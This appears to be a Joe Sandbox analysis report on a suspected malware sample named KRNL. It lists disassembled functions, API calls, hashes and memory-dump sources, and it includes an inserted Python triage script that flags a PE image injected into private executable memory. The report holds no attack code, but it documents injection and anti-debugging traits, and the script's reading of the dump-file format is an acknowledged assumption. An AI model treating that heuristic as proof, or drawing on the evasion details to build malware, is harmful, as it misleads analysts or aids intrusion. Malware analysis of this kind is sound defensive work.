                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: J$,J^J$Uqmq$bJSJ$cJwJ$oq|q$rJnJ$tJdJ$wJbJ
                                                                                                                                                                                                                                                          • API String ID: 0-594100160
                                                                                                                                                                                                                                                          • Opcode ID: 99ed429220cc6030d532777ece67301cdc2336b41890651687883faee18324cc
                                                                                                                                                                                                                                                          • Instruction ID: ace79c1ac5836ebcc237f59b1b0d0662a53369457569fb5ab3995258eec696b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ed429220cc6030d532777ece67301cdc2336b41890651687883faee18324cc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFC10EB1A083118BC714DF55D86166BB3F2FFC2354F04892DE8858B3A4FB78A954CB5A
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(00000000,?,006FE58D), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000,?,?,00000028,006F8363), ref: 006FC210
                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32 ref: 0070138F
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 007013CD
                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 007013E0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00701428
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00701443
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID: ,Kq
• API String ID: 415426439-4204376562
• Opcode ID: de4140eb7039f8ae0cec745fc4d8360b22ca94e559da4a405fbfbf9fc03ac882
• Instruction ID: 8742ae4081815cfe086529e807c8d4fe040462c643a15d035f11897888423dd3
• Opcode Fuzzy Hash: de4140eb7039f8ae0cec745fc4d8360b22ca94e559da4a405fbfbf9fc03ac882
• Instruction Fuzzy Hash: 06514EB1A00209EBDB10DFA5DC45ABEB7F8BF45700F958669F901E71D0E7789A408B61
APIs
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataGlobalLockOpen
• String ID:
• API String ID: 1494355150-0
• Opcode ID: 11cf1c11e8cbcabd11fca72055923e1be0a33eac30008c65e1172c4418063db5
• Instruction ID: 7b7471ec2985e3dad10513ed9157fb99150564327386af1641d632e56db34497
• Opcode Fuzzy Hash: 11cf1c11e8cbcabd11fca72055923e1be0a33eac30008c65e1172c4418063db5
• Instruction Fuzzy Hash: 993159B150C3118FD300AF79968536FBBE0AF99314F51283EE8C686211D6BD898A975B
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AA0
• GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AC9
• GetACP.KERNEL32(?,?,007013BD,?,00000000), ref: 00701ADE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
• Instruction ID: 3caf728f46d057cb60f71af56788e373c4dbfaf0e9ebf429d7a3d06cf04c9499
• Opcode Fuzzy Hash: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
• Instruction Fuzzy Hash: 112186A2B02100EADB34CF58C900AD772EAEB54B54BD6C664E90AD7184F73ADD40C390
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: 6""$D$d"P"$p"F"$""$""
• API String ID: 0-1382292853
• Opcode ID: abc874c9909978c4c67d63b3286c9fd06b2b4f2b84e92e02f925d395bc13f45d
• Instruction ID: 7334df959159416c48e382d616d244ce160e02f9129f40ab737ecec1edd4b52a
• Opcode Fuzzy Hash: abc874c9909978c4c67d63b3286c9fd06b2b4f2b84e92e02f925d395bc13f45d
• Instruction Fuzzy Hash: 70B1E3B04083829BE728CF81C69576BBBF1FF85748F105A8DE5951B290D3F98648DF86
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: M2x2$c2o2$m2?2$o2x2$u202$}2q2
• API String ID: 0-1290146539
• Opcode ID: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
• Instruction ID: 3246baa6c9dc81b657b25537a01d6a69c66a68c26ad81c28aa9a33eac08b7532
• Opcode Fuzzy Hash: 9de3aaf11f0e2ee482b38c0393ecb77c9407e30e746739f3fde1d6b151a35207
• Instruction Fuzzy Hash: 176142B1A08760DBD320DF15D98166BB7F1FFC1314F48892EE8855B394E7B98904CB8A
APIs
  • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA
• GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006E206B
• CloseHandle.KERNEL32(00000000), ref: 006E207A
• _strlen.LIBCMT ref: 006E20CD
• CloseHandle.KERNEL32(00000000), ref: 006E21FD
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: CloseFileHandle_strlen$ReadSize
• String ID:
• API String ID: 1490117831-0
• Opcode ID: 535cfde92e1cd479d70663943f00d6632f5ae711a3e6a98b1ab7c1061b4646bc
• Instruction ID: 7d82d5c2f4889cd71774557edc6e1056f3f457f206df0b3871306cfa55cc606e
• Opcode Fuzzy Hash: 535cfde92e1cd479d70663943f00d6632f5ae711a3e6a98b1ab7c1061b4646bc
• Instruction Fuzzy Hash: A171D2B2C013498FCB10DFA5DC44BEEBBB6BF49310F144628E914A7391E735AA45CBA5
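The function listings above repeat two machine-readable shapes: the "APIs" items (`Name.MODULE(args), ref: address`) and the "Memory Dump Source" names (`....sdmp`, with "based on PE: true/false"). The following is an added example, not part of the Joe Sandbox report or of Joe Security's tooling, that parses both shapes and applies the check an analyst would run on them: a dump that is "based on PE" but sits in private, execute-read-write memory was not mapped by the Windows loader, which is what the report's "Injects a PE file into a foreign processes" signature is describing for the 0x400000 region. The regular expressions and the reading of the .sdmp name fields (base address, page protection, region type, as winnt.h constants) are my assumptions; they agree with every name on this page (0x20000 = MEM_PRIVATE with 0x40 = PAGE_EXECUTE_READWRITE for 0x400000; 0x1000000 = MEM_IMAGE with section-style protections for the 0x6E0000 image) but are not a documented format. The sample lines are copied from the listing.

```python
"""Parse Joe Sandbox function-listing lines and flag PE dumps in private RWX memory.

Added example (not Joe Sandbox code). The .sdmp field meanings are an ASSUMPTION
consistent with the values on this page, not a documented format.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Win32 memory constants from winnt.h (documented values).
PAGE_READONLY = 0x02
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

PROTECT_NAMES = {
    PAGE_READONLY: "PAGE_READONLY",
    PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
}
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Constructed sample input: lines copied from the report listing.
SAMPLE_LINES = [
    "  • Part of subcall function 006E1240: _strlen.LIBCMT ref: 006E12BA",
    "• GetFileSize.KERNEL32(00000000,00000000), ref: 006E2046",
    "• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006E206B",
    "• CloseHandle.KERNEL32(00000000), ref: 006E207A",
    "• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true",
    "• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true",
]

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# ASSUMED field layout: pid.seq.stamp.base.protect.unknown.memtype.tail.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9]{8})\.(?P<seq>[0-9]{8})\.(?P<stamp>[0-9]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<unknown>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.(?P<tail>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(r"Source File:\s*(?P<name>[^\s,]+\.sdmp),.*based on PE:\s*(?P<pe>true|false)")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int] = None


@dataclass
class DumpRegion:
    name: str
    pid: int
    base: int
    protect: int
    mem_type: int
    based_on_pe: Optional[bool] = None

    @property
    def protect_name(self) -> str:
        return PROTECT_NAMES.get(self.protect, hex(self.protect))

    @property
    def type_name(self) -> str:
        return TYPE_NAMES.get(self.mem_type, hex(self.mem_type))


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16), sub)


def parse_sdmp_name(name: str) -> Optional[DumpRegion]:
    m = SDMP_RE.search(name)
    if not m:
        return None
    return DumpRegion(m.group(0), int(m["pid"]), int(m["base"], 16),
                      int(m["protect"], 16), int(m["mtype"], 16))


def parse_source_line(line: str) -> Optional[DumpRegion]:
    m = SOURCE_RE.search(line)
    if not m:
        return None
    region = parse_sdmp_name(m["name"])
    if region is not None:
        region.based_on_pe = m["pe"] == "true"
    return region


def looks_like_injected_pe(region: DumpRegion) -> bool:
    """The loader maps modules as MEM_IMAGE with per-section protections; a PE
    reconstructed from MEM_PRIVATE pages that are execute-read-write was written
    there by code, e.g. a manual map / process injection."""
    return (region.based_on_pe is True
            and region.mem_type == MEM_PRIVATE
            and region.protect == PAGE_EXECUTE_READWRITE)


def summarize(lines: List[str]) -> dict:
    calls, regions = [], []
    for line in lines:
        call = parse_api_line(line)
        if call:
            calls.append(call)
            continue
        region = parse_source_line(line)
        if region:
            regions.append(region)
    return {"calls": calls, "regions": regions,
            "suspicious": [r for r in regions if looks_like_injected_pe(r)]}


if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for r in result["regions"]:
        print(f"{r.base:#010x} {r.type_name:12} {r.protect_name:24} pe={r.based_on_pe}")
    for r in result["suspicious"]:
        print(f"injected PE candidate at {r.base:#x} ({r.name})")
```

Only the 0x400000 dump is flagged; the 0x6E0000 image (the on-disk KRNL.exe module) is MEM_IMAGE with read-only, write-copy and execute-read sections, which is what a normally loaded PE looks like. Treat the flag as a triage hint to confirm against the "Injects a PE file" behaviour entry, not as proof on its own.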
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
• API String ID: 0-1618744259
APIs
  • Part of subcall function 0043CD20: LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
• FreeLibrary.KERNEL32(?), ref: 0041A030
• FreeLibrary.KERNEL32(?), ref: 0041A0CE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: Fn@n
• API String ID: 764372645-2265005453
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: 7S>S$FS;S$LSES$MR$SS
• API String ID: 0-2954923458
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007020D9
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006EF8F5
• IsDebuggerPresent.KERNEL32 ref: 006EF9C1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006EF9DA
• UnhandledExceptionFilter.KERNEL32(?), ref: 006EF9E4
Memory Dump Source
• Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
                                                                                                                                                                                                                                                          • Instruction ID: 5632d1c138e7a82584e457cfc60b87353c65b2defacd1043c6c2c13a66e8f8c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C331F6B5D013199BDF61DFA5D9497CDBBB8AF08300F1081AAE44CAB290EB759A848F45
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004184AC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: S-#9
                                                                                                                                                                                                                                                          • API String ID: 237503144-700798346
                                                                                                                                                                                                                                                          • Opcode ID: e2bc158481f8dfbd2a657db23a5401f3c476d650ecf493c40db5d62b40362113
                                                                                                                                                                                                                                                          • Instruction ID: 52d3a1a22797bc6ff2ef723818d6b4c880c4da0e2c4bb0917b947ec637b9ef44
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2bc158481f8dfbd2a657db23a5401f3c476d650ecf493c40db5d62b40362113
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E1E876A046128BC724CF28C8517ABB7E2EFD4324F19892DE8C997394EF38D941C745
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 3BD251238DC531F1BCFD68B774EF9B7A$bC$mX$pid
                                                                                                                                                                                                                                                          • API String ID: 0-3426212376
                                                                                                                                                                                                                                                          • Opcode ID: 38a496d1901cb9fc1a1a81ae934acbfbe9411e11b166e4a8648ed1bfe5718dba
                                                                                                                                                                                                                                                          • Instruction ID: 78aa410c3e571a3c71217f04774d552cfb36f3c011885ca35bd8ebc00676843d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38a496d1901cb9fc1a1a81ae934acbfbe9411e11b166e4a8648ed1bfe5718dba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44C125B15183118BD328CF24C8516AFBBE5FF84304F15492DE5AAEB3A1E738D904CB86
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 517$02"4
                                                                                                                                                                                                                                                          • API String ID: 0-4117730321
                                                                                                                                                                                                                                                          • Opcode ID: 9280ced3489e90234081316888d5cbab1c25a6192fcd2380d66ea8f60e248077
                                                                                                                                                                                                                                                          • Instruction ID: 788614aa283ce937e0284b5c45e1a05101e09933b0675d27cc46c1417dc3c243
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9280ced3489e90234081316888d5cbab1c25a6192fcd2380d66ea8f60e248077
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D13475A0C360DFD3049F28E89166BB7E1AF8A314F858A2DF4C5973A1D7399C40CB4A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @$@
                                                                                                                                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                                                                                                                                          • Opcode ID: 5b2196727f174ea9b258481d9f67c76f8990f14b878419990b001dbcc1b4b103
                                                                                                                                                                                                                                                          • Instruction ID: 482e6149b56366e601b592d2c8ef6da79fc9784322df0be9e518e1d530d1ba80
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b2196727f174ea9b258481d9f67c76f8990f14b878419990b001dbcc1b4b103
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C51E3B1A183208BD714CF28D96032BB6E2EFD9745F04A52DE4C597394E7399C08C78A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 41898e06d329f9b7dcce93df1159e086aaf4499670247650b597e40a1912500f
                                                                                                                                                                                                                                                          • Instruction ID: 56effb05c55d5e723ed47e9df777c39648b717dc24fdb7399af3515154e224fe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41898e06d329f9b7dcce93df1159e086aaf4499670247650b597e40a1912500f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F121239A18215CFC704CF28E88026BB3F2FF8A315F0A987DD945873A1EB359955DB85
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 97ee515db7b271821da0c5f6ee7e03195be19e2c0d651d664716e8c5a31a3625
                                                                                                                                                                                                                                                          • Instruction ID: 24bd7fce4cce9c11c14dc7089d7bdd62ad2ae41bb7aab5742507e38462b34f06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97ee515db7b271821da0c5f6ee7e03195be19e2c0d651d664716e8c5a31a3625
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE021135A18211CFC714CF28E8806ABB3F2FF8A315F0A987DD945973A1EB359851DB85
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Similarity
• API ID: InitializeThunk
• String ID: mA
• API String ID: 2994545307-377813790
Similarity
• API ID:
• String ID: "C
• API String ID: 0-2206442469
Similarity
• API ID:
• String ID: "C
• API String ID: 0-2206442469
Similarity
• API ID:
• String ID: "C
• API String ID: 0-2206442469
Similarity
• API ID:
• String ID: XqR
• API String ID: 0-4205905425
Similarity
• API ID:
• String ID: ''
• API String ID: 0-2284169615
Similarity
• API ID:
• String ID: Q R
• API String ID: 0-3646680613
Similarity
• API ID:
• String ID: EVJ_
• API String ID: 0-352177915
                                                                                                                                                                                                                                                          • Opcode ID: 4f677c5bacfc321699cb78afe51e88b79b6ee33044fbd01274c2f648ee761e36
